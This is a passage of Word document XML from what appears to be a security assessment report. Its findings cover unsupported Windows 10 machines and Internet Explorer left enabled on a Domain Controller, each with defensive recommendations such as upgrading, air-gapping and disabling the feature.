          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">are running Windows 10 which has been deprecated by Microsoft on October 14, 2025. Microsoft will no longer be releasing security patches for this </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5F649A6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6C46A650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of Windows, leaving all machines vulnerable to future </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2ED060B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploits and vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6736DDBC" w14:textId="65602AD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C0684CD" w:rsidP="0D325B6E" w:rsidRDefault="7C0684CD" w14:paraId="666E5A59" w14:textId="3FAB856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4A959F6" w:rsidP="0D325B6E" w:rsidRDefault="44A959F6" w14:paraId="7A1CC08D" w14:textId="26EEC038">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4A959F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As Windows 10 is no longer receiving public security patches, this leaves the ATP Windows machines vulnerable to future vulnerabilities found in Windows 10. This could allow for </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4A469C7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>compromise of the Windows machines that can no longer be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7199F2DF" w14:textId="53E37F6A">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C0684CD" w:rsidP="0D325B6E" w:rsidRDefault="7C0684CD" w14:paraId="4BC0E42D" w14:textId="43FC45E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2384B57" w:rsidP="0D325B6E" w:rsidRDefault="22384B57" w14:paraId="28454515" w14:textId="63F2B3A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384B57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1: Log into the Windows machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22384B57" w:rsidP="0D325B6E" w:rsidRDefault="22384B57" w14:paraId="2CDED895" w14:textId="25C2954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2384B57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 2: Navigate to Settings &gt; About to view current version of Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5436B6DA" w14:textId="3F5A1119">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7C0684CD" w:rsidP="0D325B6E" w:rsidRDefault="7C0684CD" w14:paraId="659160F3" w14:textId="2E1C5C6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7C0684CD" w:rsidP="0D325B6E" w:rsidRDefault="7C0684CD" w14:paraId="04F186FD" w14:textId="3FB9F3DD">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C0684CD">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195740D5" w:rsidP="0D325B6E" w:rsidRDefault="195740D5" w14:paraId="39BFD8D8" w14:textId="172A7CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>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5740D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upgrade all Windows 10 machines to Windows 11 to continue receiving security updates from Microsoft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="195740D5" w:rsidP="0D325B6E" w:rsidRDefault="195740D5" w14:paraId="53B7CDC7" w14:textId="1DFCF7DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>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195740D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If a machine or software is incompatible from being upgraded to Windows 11, it is recommended to remove the outdated machine</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2B9D006A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the ATP network and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2B9D006A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>airgap</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2B9D006A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the machine until </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2B9D006A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a feasible</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2B9D006A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> way of converting to Windows 11 is found.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7C0684CD" w:rsidP="0D325B6E" w:rsidRDefault="7C0684CD" w14:paraId="0FA59883" w14:textId="526CAC4F">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C0684CD">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8BF8FBC" w:rsidP="0D325B6E" w:rsidRDefault="48BF8FBC" w14:paraId="735EB55F" w14:textId="7F47EFB9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R3f6cd2a6b9ab43c5">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="48BF8FBC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft - Windows 10 End of Life</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="48BF8FBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="76F3BC77" w14:textId="09E1D9F2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1B2ED9E0" w14:textId="0543C3B2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7B91E9D1" w:rsidP="0D325B6E" w:rsidRDefault="7B91E9D1" w14:paraId="62D5C828" w14:textId="014E0DB8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7B91E9D1">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80" w:themeShade="FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7B91E9D1">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7B91E9D1">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="55E60D62">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Internet Explorer Enabled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0"/>
        <w:gridCol w:w="1650"/>
        <w:gridCol w:w="2430"/>
        <w:gridCol w:w="4365"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0F5241EE">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CD24E9D" w14:textId="77D558C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 xml:space="preserve">M0800 </w:t>
            </w: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4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0B36F8C" w14:textId="46ECB58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5881ED79" w14:textId="7C3BCF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FABC453">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978753" w14:textId="4CB7025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1C07F8F8" w14:textId="5D0FF162">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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648C4A0A" w14:textId="362EE437">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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70A8FE5B" w14:textId="020A5F73">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5FCF8C2F">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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85B3446" w14:textId="28DB276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92D050"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="24050928" w:rsidP="0D325B6E" w:rsidRDefault="24050928" w14:paraId="5A9CA1EE" w14:textId="24A22CD6">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="24050928">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07623A3C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4009B078"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="26B0B495">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D320BE1" w14:textId="315272D3">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w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.0</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">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598C796" w14:textId="17890A2B">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rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1960C9FB">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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797FE99" w14:textId="090109F7">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75B8A3C" w14:textId="554AE3F0">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04117846" w14:textId="6D1A1CC0">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1ABFC03B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1590" w:type="dxa"/>
            <w:vMerge/>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14:paraId="63CA3D96"/>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076A96E" w14:textId="580B172C">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>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601D045" w:rsidP="0D325B6E" w:rsidRDefault="7601D045" w14:paraId="15BFEA6E" w14:textId="6C1FEDBF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rbbdb14374c4e41c0">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7601D045">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>M1042: Disable or Remove Feature or Program</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="73C2DA7F">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="324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3B8BF33" w14:textId="4F5CDDEB">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2F71A1C2" w14:textId="73F4B322">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="07B1971B" w14:textId="55528FC6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7B91E9D1" w:rsidP="0D325B6E" w:rsidRDefault="7B91E9D1" w14:paraId="527A68CC" w14:textId="38367EB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3B782C56" w:rsidP="0D325B6E" w:rsidRDefault="3B782C56" w14:paraId="03E2788A" w14:textId="34C5AE19">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B782C56">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Internet Explorer is still installed and enabled on the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3B782C56">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Domain Controller.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3B782C56">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Internet Explorer </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ha</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="10780BAA">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06B861C5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
